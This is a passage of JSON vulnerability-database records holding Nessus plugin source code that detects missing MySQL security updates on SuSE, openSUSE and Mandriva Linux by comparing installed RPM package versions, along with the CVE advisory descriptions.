reference:\"libmysqlclient16-32bit-5.1.36-6.8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r16-32bit-5.1.36-6.8.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient16 / libmysqlclient16-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:53:49", "references": ["http://support.novell.com/security/cve/CVE-2009-4028.html", "http://support.novell.com/security/cve/CVE-2009-4030.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669", "http://support.novell.com/security/cve/CVE-2008-7247.html", "http://support.novell.com/security/cve/CVE-2009-4019.html"], "pluginID": "50935", "description": "Updated MySQL packages fix the following bugs :\n\n - upstream #47320 - checking server certificates.\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries.\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in GeomFromWKB(). (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed.\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed (CVE-2009-4030)", "edition": 5, "reporter": "Tenable", "published": "2010-12-02T00:00:00", "title": "SuSE 11 Security Update : MySQL (SAT Patch Number 2317)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mysql-client", "p-cpe:/a:novell:suse_linux:11:mysql-Max", "p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15", "p-cpe:/a:novell:suse_linux:11:libmysqlclient15-32bit", "p-cpe:/a:novell:suse_linux:11:mysql", "p-cpe:/a:novell:suse_linux:11:libmysqlclient15"], "id": "SUSE_11_LIBMYSQLCLIENT-DEVEL-100429.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50935", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50935);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:20 $\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"SuSE 11 Security Update : MySQL (SAT Patch Number 2317)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated MySQL packages fix the following bugs :\n\n - upstream #47320 - checking server certificates.\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries.\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB(). (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed.\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-7247.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4030.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 2317.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libmysqlclient15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libmysqlclient_r15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mysql-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mysql-client-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient_r15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mysql-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mysql-client-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libmysqlclient15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libmysqlclient_r15-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mysql-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mysql-Max-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mysql-client-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"libmysqlclient15-32bit-5.0.67-13.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-13.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T16:54:04", "references": ["https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669"], "pluginID": "46235", "description": "Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed (CVE-2009-4030)", "edition": 6, "reporter": "Tenable", "published": "2010-05-05T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:libmysqlclient16-32bit", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mysql-ndb-storage", "p-cpe:/a:novell:opensuse:mysql-ndb-management", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient16", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:mysql-ndb-tools", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:mysql-ndb-extra", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r16", "p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit", "p-cpe:/a:novell:opensuse:mysql-bench"], "id": "SUSE_11_2_LIBMYSQLCLIENT-DEVEL-100401.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46235", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-2315.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46235);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)\");\n script_summary(english:\"Check for the libmysqlclient-devel-2315 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r16-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-ndb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient-devel-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient16-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqlclient_r16-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libmysqld-devel-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-bench-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-client-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-debug-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-extra-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-management-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-storage-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-ndb-tools-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-test-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"mysql-tools-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient16-32bit-5.1.36-6.8.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"libmysqlclient_r16-32bit-5.1.36-6.8.8\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient16 / libmysqlclient16-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:36:32", "references": ["http://dev.mysql.com/doc/refman/5.0/en/news-5-0-87.html", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.html", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-89.html"], "pluginID": "44043", "description": "Multiple vulnerabilities has been found and corrected in mysql :\n\nmysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement (CVE-2009-4019).\n\nThe vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library (CVE-2009-4028).\n\nMySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079 (CVE-2009-4030).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0 customers.\n\nThe updated packages have been patched to correct these issues.\nAdditionally for 2009.0 and MES5 mysql has also been upgraded to the last stable 5.0 release (5.0.89).", "edition": 6, "reporter": "Tenable", "published": "2010-01-18T00:00:00", "title": "Mandriva Linux Security Advisory : mysql (MDVSA-2010:011)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Mandriva Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "modified": "2018-07-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:mysql-doc", "p-cpe:/a:mandriva:linux:mysql-ndb-management", "p-cpe:/a:mandriva:linux:mysql-bench", "p-cpe:/a:mandriva:linux:mysql", "p-cpe:/a:mandriva:linux:libmysql-devel", "p-cpe:/a:mandriva:linux:lib64mysql15", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:mysql-max", "p-cpe:/a:mandriva:linux:mysql-ndb-tools", "p-cpe:/a:mandriva:linux:lib64mysql-static-devel", "p-cpe:/a:mandriva:linux:mysql-ndb-storage", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:mysql-common", "p-cpe:/a:mandriva:linux:mysql-ndb-extra", "p-cpe:/a:mandriva:linux:mysql-client", "p-cpe:/a:mandriva:linux:lib64mysql-devel", "p-cpe:/a:mandriva:linux:libmysql-static-devel", "p-cpe:/a:mandriva:linux:libmysql15"], "id": "MANDRIVA_MDVSA-2010-011.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44043", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:011. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44043);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 20:59:16\");\n\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n script_bugtraq_id(37075, 37076, 37297);\n script_xref(name:\"MDVSA\", value:\"2010:011\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mysql (MDVSA-2010:011)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in mysql :\n\nmysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not\n(1) properly handle errors during execution of certain SELECT\nstatements with subqueries, and does not (2) preserve certain\nnull_value flags during execution of statements that use the\nGeomFromWKB function, which allows remote authenticated users to cause\na denial of service (daemon crash) via a crafted statement\n(CVE-2009-4019).\n\nThe vio_verify_callback function in viosslfactories.c in MySQL 5.0.x\nbefore 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a\nvalue of zero for the depth of X.509 certificates, which allows\nman-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers\nvia a crafted certificate, as demonstrated by a certificate presented\nby a server linked against the yaSSL library (CVE-2009-4028).\n\nMySQL 5.1.x before 5.1.41 allows local users to bypass certain\nprivilege checks by calling CREATE TABLE on a MyISAM table with\nmodified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are\noriginally associated with pathnames without symlinks, and that can\npoint to tables created at a future time at which a pathname is\nmodified to contain a symlink to a subdirectory of the MySQL data home\ndirectory, related to incorrect calculation of the\nmysql_unpacked_real_data_home value. NOTE: this vulnerability exists\nbecause of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n(CVE-2009-4030).\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers.\n\nThe updated packages have been patched to correct these issues.\nAdditionally for 2009.0 and MES5 mysql has also been upgraded to the\nlast stable 5.0 release (5.0.89).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-87.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-89.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64mysql15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libmysql15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mysql-ndb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64mysql-devel-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64mysql-static-devel-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64mysql15-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libmysql-devel-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libmysql-static-devel-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libmysql15-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-bench-5.0.45-8.4mdv2008.0\", 